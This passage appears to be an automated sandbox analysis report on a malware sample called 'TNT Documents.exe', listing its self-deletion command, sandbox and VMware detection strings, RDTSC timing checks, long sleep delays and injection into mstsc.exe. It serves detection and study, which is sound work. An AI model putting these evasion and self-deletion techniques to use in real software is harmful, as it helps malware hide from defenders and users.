          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B89C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332B7E5 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03325CC4 push FFFFFFDFh; iretd
          Source: TNT Documents.exeStatic PE information: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.56105630003

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: TNT Documents.exe PID: 4548, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000003318614 second address: 000000000331861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000033189AE second address: 00000000033189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exe TID: 5188Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.309276039.000000000ED78000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.298506976.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.339998059.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01574120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01570050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01570050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01612073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01621074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01624015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01624015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01625BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01559240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01555210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01573A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01568A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01582AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01577D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01593D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01628D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h]
